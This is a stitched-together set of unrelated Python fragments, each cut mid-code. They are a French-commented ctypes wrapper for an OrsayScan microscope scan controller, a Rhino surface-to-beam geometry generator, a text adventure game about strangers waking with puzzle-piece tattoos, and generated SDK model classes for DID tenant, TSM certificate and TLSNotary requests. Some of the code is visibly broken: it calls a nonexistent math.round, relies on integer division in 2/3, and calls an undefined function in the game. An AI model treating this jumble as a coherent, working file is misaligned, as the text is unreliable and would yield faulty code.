multiplié par le nombre d'entrées, multiplié par le paramètre lineaveragng ***
"""
sx = c_int()
sy = c_int()
res = self.__OrsayScangetImageSize(self.orsayscan, self.gene, byref(sx), byref(sy))
if (not res):
raise Exception("Failed to get orsayscan image size")
return int(sx.value), int(sy.value)
def setImageArea(self, sizex : int, sizey : int, startx : int, endx : int, starty : int, endy : int) -> bool:
"""
Définit une aire pour le balayage.
Définit une aire pour le balayage.
sizex, sizey taille de l'image complète
startx, endx début et fin de la largeur du rectangle
starty, endy début et fin de la hauteur.
"""
# self.__verifyStrictlyPositiveInt(sizex)
# self.__verifyStrictlyPositiveInt(sizey)
return self.__OrsayScansetImageArea(self.orsayscan, self.gene, sizex, sizey, startx, endx, starty, endy)
def getImageArea(self) -> (bool, int, int, int, int, int, int):
"""
Donne l'aire réduite utilisée,
retourne les paramètres donnés à la fonction setImageArea ou ceux les plus proches valides.
"""
sx, sy, stx, ex, sty, ey = c_int(), c_int(), c_int(), c_int(), c_int(), c_int()
res = self.__OrsayScangetImageArea(self.orsayscan, self.gene, byref(sx), byref(sy), byref(stx), byref(ex), byref(sty), byref(ey))
return res, int(sx.value), int(sy.value), int(stx.value), int(ex.value), int(sty.value), int(ey.value)
@property
def pixelTime(self) -> float:
"""
Donne le temps par pixel
"""
return self.__OrsayScangetPose(self.orsayscan, self.gene)
@pixelTime.setter
def pixelTime(self, value : float):
"""
Définit le temps par pixel
"""
self.__OrsayScansetPose(self.orsayscan, self.gene, value)
#
# Callback qui sera appelée lors d'arrivée de nouvelles données
#
def registerLocker(self, fn):
"""
Définit la fonction callback appelée lorsque de nouvelles données sont présentes
Elle a pour but de passer un tableau image sa dimension et son type de données
On ne doit détruire cet objet avant l'appel d'une fonction unlock
Voir programme demo.
"""
self.__OrsayScanregisterLocker(self.orsayscan, fn)
def registerUnlocker(self, fn):
"""
Definit la fonction appelée à la fin du transfert de données.
recoit newdata vrai si de nouvelles données sont effectivement là.
Utiliser de préférence la fonction registerUnlockerA plus riche en informations sur le flux de données
voir programe demo
"""
self.__OrsayScanregisterUnlocker(self.orsayscan, fn)
def registerUnlockerA(self, fn):
"""
Definit la fonction appelée à la fin du transfert de données.
reçoit newdata, le numéro de séquence de l'image en cours, rect: les coordonnées du rect où les données ont été modifiées.
voir programe demo
"""
self.__OrsayScanregisterUnlockerA(self.orsayscan, fn)
def startSpim(self, mode : int, linesaveraging : int, Nspectra=1, save2D=False) -> bool:
"""
Démarre l'acquitisition de l'image.
mode: --- expliqué plus tard ---
lineaveraging: nombre de lignes à faire avant de passer à la ligne suivante.
retourne vrai si l'acquisition a eu lieu.
"""
return self.__OrsayScanStartSpim(self.orsayscan, self.gene, mode, linesaveraging,Nspectra,save2D)
def setScanClock(self,trigger_input=0) -> bool:
"""
set the input line for starting the next pixel in the STEM imaging (pin 9 and 5 on subD9)
Parameters
----------
trigger_input: 0 for pin 9, 1 for pin 5, 2 for CL ready, 3 for In3, 4 for EELS ready
Returns
-------
"""
return self.__OrsayScanSetScanClock(self.orsayscan, self.gene, trigger_input)
def startImaging(self, mode : int, linesaveraging : int) -> bool:
"""
Démarre l'acquitisition de l'image.
mode: --- expliqué plus tard ---
lineaveraging: nombre de lignes à faire avant de passer à la ligne suivante.
retourne vrai si l'acquisition a eu lieu.
"""
return self.__OrsayScanStartImaging(self.orsayscan, self.gene, mode, linesaveraging)
def stopImaging(self, cancel : bool) -> bool:
"""
Arrete l'acquisition d'images
cancel vrai => immédiat, faux => à la fin du scan de l'image en cours
"""
return self.__OrsayScanStopImaging(self.orsayscan, self.gene, cancel)
def getScanCount(self) -> int:
"""
Donne le nombe de balayages déjà faits
"""
return self.__OrsayScanGetScansCount(self.orsayscan)
def setScanRotation(self, angle : float):
"""
Définit l'angle de rotation du balayage de l'image
"""
self.__OrsayScanSetRotation(self.orsayscan, angle)
def getScanRotation(self) -> float:
"""
Relit la valeur de l'angle de rotation du balayage de l'image
"""
return self.__OrsayScanGetRotation(self.orsayscan)
def setScanScale(self, plug, xamp : float, yamp : float):
"""
Ajuste la taille des signaux analogiques de balayage valeur >0 et inf"rieure à 1.
"""
self.__OrsayScanSetScale(self.orsayscan, plug, xamp, yamp)
def getImagingKind(self) -> int:
kind = self.__OrsayScanGetImagingKind(self.orsayscan, self.gene)
return kind
def setVideoOffset(self, inp : int, offset : float):
"""
Définit l'offset analogique à ajouter au signal d'entrée afin d'avoir une valeur 0 pour 0 volts
En principe, c'est un réglage et pour une machine cela ne devrait pas bouger beaucoup
"""
self.__OrsayScanSetVideoOffset(self.orsayscan, inp, offset)
def getVideoOffset(self, inp : int) -> float:
"""
Donne la valeur de l'offset vidéo
"""
return self.__OrsayScanGetVideoOffset(self.orsayscan, inp)
def SetProbeAt(self, px : int, py : int):
# bool SCAN_EXPORT OrsayScanSetProbeAt(self.orsayscan, int gene, int px, int py);
return self.__OrsayScanSetProbeAt(self.orsayscan, self.gene, px, py)
#void SCAN_EXPORT OrsayScanSetEHT(self.orsayscan, double val);
def SetEHT(self, val):
self.__OrsayScanSetEHT(self.orsayscan,val)
def GetEHT(self):
return self.__OrsayScanGetEHT(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetMaxFieldSize(self.orsayscan);
def GetMaxFieldSize(self):
return self.__OrsayScanGetMaxFieldSize(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetFieldSize(self.orsayscan);
def GetFieldSize(self):
return self.__OrsayScanGetFieldSize(self.orsayscan)
#double SCAN_EXPORT OrsayScanGetScanAngle(self.orsayscan, short *mirror);
def GetScanAngle(self,mirror):
return self.__OrsayScanGetScanAngle(self.orsayscan, mirror)
#bool SCAN_EXPORT OrsayScanSetFieldSize(self.orsayscan, double field);
def SetFieldSize(self,field):
return self.__OrsayScanSetFieldSize(self.orsayscan, field)
#bool SCAN_EXPORT OrsayScanSetBottomBlanking(self.orsayscan, short mode, short source, double beamontime, bool risingedge, unsigned int nbpulses, double delay);
def SetBottomBlanking(self,mode,source,beamontime=0,risingedge=True,nbpulses=0,delay=0):
""" Définit le blanker avant l'échantillon sur un VG/Nion
mode : 0 blanker off, 1 blanker On, 2 controlled by source,
3 controlled by source but with locally defined time (beamontime parametre)
source : to be choosen based on configuration file (eels
camera readout, cl camera readout, | |
<filename>UR_Control/geometry/surface.py<gh_stars>0
import Rhino.Geometry as rg
from geometry.beam import Beam
import copy
import math
class Surface(object):
def __init__(self, surface, u_div=5, v_div=3, beam_width = 160, beam_thickness = 40):
""" Initialization
:param surface: Base rg.geometry object that will be edited
:param u_div: How many divisions this surface will have in the u_direction (default = 5)
:param v_div: How many divisions this surface will have in the v_direction (default = 3)
:param beam_width: The initial width of the beams (default = 160)
:param beam_thickness: The initial thickness of the different beams (default = 40)
"""
domain = rg.Interval(0, 1)
surface.SetDomain(0, domain)
surface.SetDomain(1, domain)
self.surface = surface
self.shared_edges = []
self.bottom_curve = surface.IsoCurve(0, 0)
self.top_curve = surface.IsoCurve(0, 1)
self.left_curve = surface.IsoCurve(1, 0)
self.right_curve = surface.IsoCurve(1, 1)
self.bottom_pt = self.bottom_curve.PointAt(0.5)
self.top_pt = self.top_curve.PointAt(0.5)
self.left_pt = self.left_curve.PointAt(0.5)
self.right_pt = self.right_curve.PointAt(0.5)
self.u_div = u_div
self.v_div = v_div
self.beam_w = beam_width
self.beam_t = beam_thickness
def instantiate_beams(self, mapping_type = 0, seam_type = 0, warp_type = 3, will_flip = False, flush_beam_count = 2):
""" Function that instatiates the beam generation
:param mapping_type: Some default types of surface logics applied ([1] = even - default, [2/3, 1] = seaming type)
:param seam_type: Which type of seam this object has (0 = single flush - default, 1 = multi flush left, 2 = multi flush right, 3 = multi flush both sides)
:param warp_type: How the surface is being warped (0 = no warping - default, 1 = left, 2 = right, 3 = both sides)
:param will_flip: Whether the surface will flip or not (default = False)
"""
self.mapping_type = [[1], [2/3, 1]][mapping_type]
self.seam_type = seam_type
self.warp_type = warp_type
self.will_flip = will_flip
self.flush_beam_count = flush_beam_count
self.warped_srf = copy.deepcopy(self.surface)
# changing the u_div count in relation to the mapping_type
total_flush_beam_count = math.round(self.seam_type / 2.0) * self.flush_beam_count
self.mapping_pattern_length = len(self.mapping_type)
# checking whether there are enough u_div to map out a surface in the middle
if self.u_div < total_flush_beam_count:
self.main_srf_div = 2
self.u_div = self.main_srf_div * self.mapping_pattern_length + total_flush_beam_count
# checking whether the amount of splits in the middle is a multiple of it's mapping_pattern_len
elif not(int(self.u_div - total_flush_beam_count) % self.mapping_pattern_length == 0):
self.main_srf_div = math.ceil((self.u_div - total_flush_beam_count) / self.mapping_pattern_length)
self.u_div = self.main_srf_div * self.mapping_pattern_length + total_flush_beam_count
# initializing the beam set
self.beams = []
if self.will_flip:
# flip
domain = rg.Interval(0, 1)
self.surface.Reverse(0, True)
self.surface.SetDomain(0, domain)
self.end_isocrvs = [self.surface.GetIsocurve(0, 0), self.surface.GetIsocurve(0, 1)]
# setting up how and what needs to be run in order
# does flipping matter here ???
o_half_t = .5 * self.beam_t
o_flush_seam = (self.flush_beam_count - .5) * self.beam_t
# starting condition of the beam instantiation
self.div_counter = 0
# single - flush condition
if self.seam_type == 0:
# simple even condition
# absolute offset of half the beam_t
self.__offset_sides_surface(offset_dis = o_half_t, sides = 3)
self.__warp_surface()
self.__instantiate_main_beams(start_beams = True, end_beams = True)
# multi - flush condition on the left
elif self.seam_type == 1:
# flush condition on the left
# initializing the flush beams
self.__multi_flush_seams(location = 0)
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 1)
self.__offset_sides_surface(offset_dis = o_half_t, sides = 2)
self.__warp_sides_surface()
self.__instantiate_main_beams(start_beams = False, end_beams = True)
# multi - flush condition on the right
elif self.seam_type == 2:
# flush condition on the right
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 2)
self.__offset_sides_surface(offset_dis = o_half_t, sides = 1)
self.__warp_sides_surface()
self.__instantiate_main_beams(start_beams = True, end_beams = False)
# initializing the flush beams
self.__multi_flush_seams(location = 1)
# multi - flush conditon on both sides
elif self.seam_type == 3:
# flush condition on both sides
# initializing the first set of flush conditions
self.__multi_flush_seams(location = 0)
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 3)
self.__warp_sides_surface()
# initializing the second set of flush conditions
self.__multi_flush_seams(location = 1)
if will_flip:
# flip back
domain = rg.Interval(0, 1)
self.surface.Reverse(0, True)
self.surface.SetDomain(0, domain)
# reversing the direction of the base_plane of the beam
self.beams = list(reversed(self.beams))
def __instantiate_main_beams(self, start_beams = False, end_beams = False):
""" internal method that sets out the beams on the main surface
:param start_beams: Whether the main surface is mapped from the left edge of the surface or skips over the first one
:param end_beams: Whether the main surface is mapped until the end on the right or the last one is ignored
"""
division_range = (int(start_beams) + self.main_srf_div - 1 + int(end_beams))
u_val_list = []
[u_val_list.extend([(u_map_set_val + u_val / division_range) for u_map_set_val in self.mapping_type]) for u_val in range(int(start_beams), int(start_beams) + self.main_srf_div, 1)]
for u in u_val_list:
inner_arr = []
for v in range(self.v_div):
if (self.div_counter % 2 == 0 and v % 2 == 1) or (self.div_counter % 2 == 1 and v % 2 == 0):
continue
p1 = self.warped_srf.PointAt(u, float(v)/self.v_div)
p2 = self.warped_srf.PointAt(u, float(v+1)/self.v_div)
length = p1.DistanceTo(p2)
center = rg.Point3d((p1 + p2) / 2)
_, uu, vv = self.warped_srf.ClosestPoint(center)
normal = self.warped_srf.NormalAt(uu, vv)
x_axis = rg.Vector3d(p1) - rg.Vector3d(p2)
x_axis.Unitize()
y_axis = rg.Vector3d.CrossProduct(normal, x_axis)
plane = rg.Plane(center, x_axis, normal)
beam = Beam(plane, length, self.beam_w, self.beam_t)
inner_arr.append(beam)
self.beams.append(inner_arr)
self.div_counter += 1
def __multi_flush_seams(self, location = 0, will_flip = False):
""" method to create a flush seam with n amount of beams
:param location: Whether you're considering the end or the start of the system (defualt = 0)
:param will_flip: What the start condition is (default = False)
"""
# getting the correct isocurve of the surface
local_curve = self.end_isocrvs[location]
# getting the domain of the curve
t_start, t_end = local_curve.Domain[0], local_curve.Domain[1]
t_delta = t_end - t_start
t_set = [t_start, (t_end + t_start) / 2, t_end]
pt_set = [local_curve.PointAt(t_val) for t_val in t_set]
curve_plane = rg.Plane(pt_set[0], pt_set[1], pt_set[2])
# getting the t_values on that curve to describe the beam lines
t_vals = [t_start + t_delta * v / (self.v_div + 1) for v in range (self.v_div + 1)]
# generating the move vectors for the curves
# to check whether you're at the start or the end of the surface
if (location == 0):
switch_flag = 0
else:
switch_flag = - self.flush_beam_count
mv_vectors = [curve_plane.ZAxis * self.beam_t * (switch_flag + .5 + i) for i in range(self.flush_beam_count )]
# # getting the lines
# if (will_flip):
for mv_vector in mv_vectors:
temp_curve = copy.deepcopy(local_curve)
temp_curve.Translate(mv_vector)
inner_arr = []
for v in range(self.v_div):
if (self.div_counter % 2 == 0 and v % 2 == 1) or (self.div_counter % 2 == 1 and v % 2 == 0):
continue
p1 = temp_curve.PointAt(t_vals[v])
p2 = temp_curve.PointAt(t_vals[v + 1])
length = p1.DistanceTo(p2)
center = rg.Point3d((p1 + p2) / 2)
z_axis = curve_plane.ZAxis
x_axis = rg.Vector3d(p1) - rg.Vector3d(p2)
x_axis.Unitize()
y_axis = rg.Vector3d.CrossProduct(z_axis, x_axis)
plane = rg.Plane(center, x_axis, y_axis)
beam = Beam(plane, length, self.beam_w, self.beam_t)
inner_arr.append(beam)
self.beams.append(inner_arr)
self.div_counter += 1
def __offset_sides_surface(self , offset_dis=20, rel_or_abs = False, sides = 0, sampling_count = 25):
""" method that returns a slightly shrunk version of the surface along the v direction
:param offset_dis: Offset Distance (abs or relative)
:param rel_or_abs: Flag that states whether you offset the surface absolutely or relative - if relative u domain has to be set correctly!!! (rel = True, abs = False, default = False)
:param sides: Which sides should be offseted (0 = nothing - default, 1 = left, 2 = right, 3 = both)
:param sampling_count: Precision at which the surface should be rebuild
"""
# first of all checking whether you have to do anything at all
if not (sides == 0):
local_srf = self.warped_srf
# case that surface offset is relative
if rel_or_abs:
u_div = local_srf.Domain(0)
if (sides == 1):
offsets = 1
elif (sides == 2):
offsets = 1
elif (sides == 3):
offsets = 2
# making sure you don't make the surface dissappear
if offset_dis * offsets > .9 * u_div:
offset_dis = .9 * u_div / offsets
local_srf.SetDomain(1, rg.Interval(0, sampling_count - 1))
temp_isocurves = [local_srf.IsoCurve(0, v_val) for v_val in range(sampling_count)]
temp_isocurves_shortened = []
for isocurve in temp_isocurves:
# getting the length and the domain of every isocurve
start_t, end_t | |
guys begin to move closer circling around you two. You step to the side so you all form a small circle.
"No idea my mind is completely blank" one of theem says. His voice was incredibly deep considering how young he looked. He had very dark skin and his hair was in these reall nice dreads.
He had a sharp jawline a chiseled beard. "My name's Tyree though, what about you guys?" He was very handsome.
"I'm Tori, I'm from England" Tori smiled.
"I'm Koen, I live in Canada. I can't really remember much though..." Koen, the guy standing next to you says as he rubs the back of his head.
You immediately connect with his accent for it's very similar to yours unlike Tyree's and
Tori's. You look at Koen's hair and can't help but notice how well kept it was. It reminded you of your ex who also had very nice hair.
"Yeah man, my mind is completely out of it. I'm Kevin, can't really remember where I'm from yet. Luck bastards." Kevin playfully smirked, he seemed very warm and playful.
His phydique was charming, even you had to admit that much. You felt excited but also overwhelmed
to see yourself surrounded by good looking guys and a girl. You've never been that one good looking girl or anywhere near good looking. You had a very generic face with dark brown eyes and your hair was always tied up in the same bun.
You remembered why you stopped trying on your looks, it was when your ex had dumped you for some girl on the honor roll. Even at twenty years old, a sophomore in college you still haven't managed to get your looks or life together.
"Alright so no one has ANY idea where we are or how we got here?" Tori asks throwing her hands in the air. You then realized how small she was because she wasn't any taller than you. You were only five one which you were both proud of and embarrassed.
You'll probably ask her later just to confirm and it'd serve as good small talk.
"No but my back is killing me, can someone give me a massage?" Kevin laughed obviously in pain.
"Here turn around let me check" Tyree walked over to him and lifted Kevin's shirt up. Kevin groaned and tried to move away but Tyree held him in place. "All I see is your nice tattoo dude."
"I've never gotten a tattoo..." Kevin mumbled.
"Check if I have one." Tyree turned around and lifted his shirt so everyone could see. On his back was a drawing of a puzzle piece with abstract paintings on it.
"Do we all have it?" Tori gasped lifting the back of her shirt to reveal another puzzle piece. Koen quickly followed to also show another puzzle piece. You stubbornly lift your shirt up awkwardly
making sure not to expose the front. You walked closer to them in the circle. You do your best to look behind you and notice all the puzzle pieces seem to fit with each other. Yours fit with Tori and Kevin's which made you feel foolish pride.
"What even is this? Oh dude my mom's gonna kill me." Koen frowned.
"What if this is an experiment?" Tori asked, putting her shirt down.
"Well this is pretty messed up. But if it is then they obviously want us to do something. Prove something." Tyree said running his fingers on his lips.
"Whatever look at where we are, we're in the middle of nowhere. All I see is grass grass grass. Wait" Koen stopped suddenly and pointed behind Kevin. There was a mountain with a forest surrounding it. Although it was extrememly far away
the forest made it seem as if it were closer.
"That's our best shot at finding anything. I can't see anything else." Tori suggested.
"Alright let's start moving then. Everyone in?" Tyreen said, looking at you.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
''')
responseTori = input('"Are you in, yes or no?" Tori asked.')
if responseTori == 'yes':
headingToMountF()
elif responseTori == 'no':
print('You are left behind as they head to the mount. Days later you die from hunger.')
else:
exit()
def headingToMountF():
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('You follow them to the mountain. Tyreen had managed to estimate the time using the sun and he said it was around 5 o\'clock meaning that it had been over two hours since they first started walking')
print('After hours of walking the sun began to fall and night was approaching.')
print('The five of you agree to continue since you could already see the forest up ahead. Koen had mentioned that there might be "creatures" there that they don\'t know of. You agreed with Tori to sout the area once you got there and set up camp.')
print('After arriving at the edge of the forest you and Tyreen walk a number of meters away and come back telling everyone it\'d be safe for now.')
print('You all help bring supplies to Koen who had begun to form a fire and contain it.')
print('Everyone eventually begins to go to sleep.')
print('Who do you sleep next to?')
people = ['tori', 'koen', 'tyree', 'kevin']
responsePeople = input('')
if responsePeople not in people:
print('Who do sleep next to? ')
else:
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('The following morning you wake up next to ' + responsePeople)
print('You all begint to walk into the forest and begin to notice many small animals. You\'ve been walking with ' + responsePeople)
print('And somehow that\'s made you feel safer while walking.')
print('Tyree updated everyone everytime a new hour came by. It was around the third hour of walking when you all came across two paths.')
print('To the left the path seemed to go down a small hill where the trees covered the rest and on the right the path just stretched onto the forest.')
print('"Which one do we take?" Tori asked. They all gave each other looks and then look back to you')
answerRL = input('')
if answerRL == 'left':
print('You point left and begin to lead the group down the small incline.')
toLakeF()
elif answerRL == 'right':
print('You begin to walk down the right path as the others follow close behind.')
time.sleep(3)
print('As you walk carefully through the forest you hear a large growl. Suddenly a beast rises from the bushes. A black bear stands right above you.')
print('What do you do, Run back or Play dead?')
bearfight = ['run back', 'play dead']
answerbear = input('')
if answerbear == 'run back':
print('You succesfully run away down the left path, leaving the bear behind.')
toLake()
elif answerbear == 'play dead':
print('You play dead and hope the bear just goes away.')
time.sleep(3)
print('However the bear is too smart for that and begins to eat its free meal.')
else:
print('What do you do, Run back or play dead?')
else:
print('Choose, left or right.')
def toLakeF():
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('You all scurry down the hill and begin to smell a nice auroma that reminds you of the beach. As you all head down the path the smell gets stronger and then you begin to hear noises.')
print('You hear water crash against rocks but very faintly.')
print('Koen begins to run to the sound, you all follow behind except Tori')
print('You decide to stay behind with Tori')
print('You use this oppurtunity to try and get close. What do you say?')
print('')
print('1. "So any sports you into?"')
print('2. "Like any of \'em?"')
toriTalkAnswer = input('')
if toriTalkAnswer == '1':
print('"Well from what I can remember I did like lacrosse. But I think I\'m more of a bookworm to be honest. And given my height I can\'t do many sports." Tori giggled.')
print('"I think we might be the same height. How tall are you?" You ask politely.')
print('"Only five one. I\'m a midget!" She continued to giggle.')
print('"Same!" You begin to laugh with her.')
elif toriTalkAnswer == '2':
print('"Oh | |
if self.update_tenant_req:
self.update_tenant_req.validate()
def to_map(self):
result = dict()
if self.auth_token is not None:
result['auth_token'] = self.auth_token
if self.product_instance_id is not None:
result['product_instance_id'] = self.product_instance_id
if self.nonce is not None:
result['nonce'] = self.nonce
if self.update_tenant_req is not None:
result['update_tenant_req'] = self.update_tenant_req.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_token') is not None:
self.auth_token = m.get('auth_token')
if m.get('product_instance_id') is not None:
self.product_instance_id = m.get('product_instance_id')
if m.get('nonce') is not None:
self.nonce = m.get('nonce')
if m.get('update_tenant_req') is not None:
temp_model = DidUpdateTenantReq()
self.update_tenant_req = temp_model.from_map(m['update_tenant_req'])
return self
class UpdateThingsdidTenantResponse(TeaModel):
def __init__(
self,
req_msg_id: str = None,
result_code: str = None,
result_msg: str = None,
nonce: str = None,
executed: bool = None,
):
# 请求唯一ID,用于链路跟踪和问题排查
self.req_msg_id = req_msg_id
# 结果码,一般OK表示调用成功
self.result_code = result_code
# 异常信息的文本描述
self.result_msg = result_msg
# 交易唯一ID,等于输入
self.nonce = nonce
# 代表本操作是否是异步调用
# true: 执行完全,非异步操作.
self.executed = executed
def validate(self):
pass
def to_map(self):
result = dict()
if self.req_msg_id is not None:
result['req_msg_id'] = self.req_msg_id
if self.result_code is not None:
result['result_code'] = self.result_code
if self.result_msg is not None:
result['result_msg'] = self.result_msg
if self.nonce is not None:
result['nonce'] = self.nonce
if self.executed is not None:
result['executed'] = self.executed
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('req_msg_id') is not None:
self.req_msg_id = m.get('req_msg_id')
if m.get('result_code') is not None:
self.result_code = m.get('result_code')
if m.get('result_msg') is not None:
self.result_msg = m.get('result_msg')
if m.get('nonce') is not None:
self.nonce = m.get('nonce')
if m.get('executed') is not None:
self.executed = m.get('executed')
return self
class LoadTsmCertificatetsmRequest(TeaModel):
def __init__(
self,
auth_token: str = None,
product_instance_id: str = None,
certificate: str = None,
device_code: str = None,
device_model: str = None,
device_module: str = None,
):
# OAuth模式下的授权token
self.auth_token = auth_token
self.product_instance_id = product_instance_id
# certificate
self.certificate = certificate
# BOT
self.device_code = device_code
# H0
self.device_model = device_model
# SE
self.device_module = device_module
def validate(self):
self.validate_required(self.device_code, 'device_code')
self.validate_required(self.device_model, 'device_model')
self.validate_required(self.device_module, 'device_module')
def to_map(self):
result = dict()
if self.auth_token is not None:
result['auth_token'] = self.auth_token
if self.product_instance_id is not None:
result['product_instance_id'] = self.product_instance_id
if self.certificate is not None:
result['certificate'] = self.certificate
if self.device_code is not None:
result['device_code'] = self.device_code
if self.device_model is not None:
result['device_model'] = self.device_model
if self.device_module is not None:
result['device_module'] = self.device_module
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_token') is not None:
self.auth_token = m.get('auth_token')
if m.get('product_instance_id') is not None:
self.product_instance_id = m.get('product_instance_id')
if m.get('certificate') is not None:
self.certificate = m.get('certificate')
if m.get('device_code') is not None:
self.device_code = m.get('device_code')
if m.get('device_model') is not None:
self.device_model = m.get('device_model')
if m.get('device_module') is not None:
self.device_module = m.get('device_module')
return self
class LoadTsmCertificatetsmResponse(TeaModel):
def __init__(
self,
req_msg_id: str = None,
result_code: str = None,
result_msg: str = None,
cmd_list: List[TsmCommonCmd] = None,
):
# 请求唯一ID,用于链路跟踪和问题排查
self.req_msg_id = req_msg_id
# 结果码,一般OK表示调用成功
self.result_code = result_code
# 异常信息的文本描述
self.result_msg = result_msg
# LoadCertificateTSMCmdResponse implements Serializable
self.cmd_list = cmd_list
def validate(self):
if self.cmd_list:
for k in self.cmd_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.req_msg_id is not None:
result['req_msg_id'] = self.req_msg_id
if self.result_code is not None:
result['result_code'] = self.result_code
if self.result_msg is not None:
result['result_msg'] = self.result_msg
result['cmd_list'] = []
if self.cmd_list is not None:
for k in self.cmd_list:
result['cmd_list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('req_msg_id') is not None:
self.req_msg_id = m.get('req_msg_id')
if m.get('result_code') is not None:
self.result_code = m.get('result_code')
if m.get('result_msg') is not None:
self.result_msg = m.get('result_msg')
self.cmd_list = []
if m.get('cmd_list') is not None:
for k in m.get('cmd_list'):
temp_model = TsmCommonCmd()
self.cmd_list.append(temp_model.from_map(k))
return self
class LoadTsmResourcefileRequest(TeaModel):
def __init__(
self,
auth_token: str = None,
product_instance_id: str = None,
device_code: str = None,
device_model: str = None,
device_module: str = None,
file_version: str = None,
):
# OAuth模式下的授权token
self.auth_token = auth_token
self.product_instance_id = product_instance_id
# BOT
self.device_code = device_code
# H0
self.device_model = device_model
# SE
self.device_module = device_module
# version
self.file_version = file_version
def validate(self):
self.validate_required(self.device_code, 'device_code')
self.validate_required(self.device_model, 'device_model')
self.validate_required(self.device_module, 'device_module')
def to_map(self):
result = dict()
if self.auth_token is not None:
result['auth_token'] = self.auth_token
if self.product_instance_id is not None:
result['product_instance_id'] = self.product_instance_id
if self.device_code is not None:
result['device_code'] = self.device_code
if self.device_model is not None:
result['device_model'] = self.device_model
if self.device_module is not None:
result['device_module'] = self.device_module
if self.file_version is not None:
result['file_version'] = self.file_version
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_token') is not None:
self.auth_token = m.get('auth_token')
if m.get('product_instance_id') is not None:
self.product_instance_id = m.get('product_instance_id')
if m.get('device_code') is not None:
self.device_code = m.get('device_code')
if m.get('device_model') is not None:
self.device_model = m.get('device_model')
if m.get('device_module') is not None:
self.device_module = m.get('device_module')
if m.get('file_version') is not None:
self.file_version = m.get('file_version')
return self
class LoadTsmResourcefileResponse(TeaModel):
def __init__(
self,
req_msg_id: str = None,
result_code: str = None,
result_msg: str = None,
app_id: str = None,
cmd_list: List[TsmCommonCmd] = None,
):
# 请求唯一ID,用于链路跟踪和问题排查
self.req_msg_id = req_msg_id
# 结果码,一般OK表示调用成功
self.result_code = result_code
# 异常信息的文本描述
self.result_msg = result_msg
# appId
self.app_id = app_id
# cmd_list
self.cmd_list = cmd_list
def validate(self):
if self.cmd_list:
for k in self.cmd_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.req_msg_id is not None:
result['req_msg_id'] = self.req_msg_id
if self.result_code is not None:
result['result_code'] = self.result_code
if self.result_msg is not None:
result['result_msg'] = self.result_msg
if self.app_id is not None:
result['app_id'] = self.app_id
result['cmd_list'] = []
if self.cmd_list is not None:
for k in self.cmd_list:
result['cmd_list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('req_msg_id') is not None:
self.req_msg_id = m.get('req_msg_id')
if m.get('result_code') is not None:
self.result_code = m.get('result_code')
if m.get('result_msg') is not None:
self.result_msg = m.get('result_msg')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
self.cmd_list = []
if m.get('cmd_list') is not None:
for k in m.get('cmd_list'):
temp_model = TsmCommonCmd()
self.cmd_list.append(temp_model.from_map(k))
return self
class StartTlsnotaryTaskRequest(TeaModel):
def __init__(
self,
auth_token: str = None,
product_instance_id: str = None,
task_id: str = None,
oss_link: str = None,
):
# OAuth模式下的授权token
self.auth_token = auth_token
self.product_instance_id = product_instance_id
# 唯一的业务tlsnotary任务id
self.task_id = task_id
# 加固文件的oss链接
self.oss_link = oss_link
def validate(self):
self.validate_required(self.task_id, 'task_id')
self.validate_required(self.oss_link, 'oss_link')
def to_map(self):
result = dict()
if self.auth_token is not None:
result['auth_token'] = self.auth_token
if self.product_instance_id is not None:
result['product_instance_id'] = self.product_instance_id
if self.task_id is not None:
result['task_id'] = self.task_id
if self.oss_link is not None:
result['oss_link'] = self.oss_link
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_token') is not None:
self.auth_token = m.get('auth_token')
if m.get('product_instance_id') is not None:
self.product_instance_id = m.get('product_instance_id')
if m.get('task_id') is not None:
self.task_id = m.get('task_id')
if m.get('oss_link') is not None:
self.oss_link = m.get('oss_link')
return self
class StartTlsnotaryTaskResponse(TeaModel):
def __init__(
self,
req_msg_id: str = None,
result_code: str = None,
result_msg: str = None,
task_id: str = None,
error_code: int = None,
error_msg: str = None,
):
# 请求唯一ID,用于链路跟踪和问题排查
self.req_msg_id = req_msg_id
# 结果码,一般OK表示调用成功
self.result_code = result_code
# 异常信息的文本描述
self.result_msg = result_msg
# 唯一的业务tlsnotary任务id
self.task_id = task_id
# 业务错误码
self.error_code = error_code
# 错误信息
self.error_msg = error_msg
def validate(self):
pass
def to_map(self):
result = dict()
if self.req_msg_id is not None:
result['req_msg_id'] = self.req_msg_id
if self.result_code is not None:
result['result_code'] = self.result_code
if self.result_msg is not None:
result['result_msg'] = self.result_msg
if self.task_id is not None:
result['task_id'] = self.task_id
if self.error_code is not None:
result['error_code'] = self.error_code
if self.error_msg is not None:
result['error_msg'] = self.error_msg
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('req_msg_id') is not None:
self.req_msg_id = m.get('req_msg_id')
if m.get('result_code') is not None:
self.result_code = m.get('result_code')
if m.get('result_msg') is not None:
self.result_msg = m.get('result_msg')
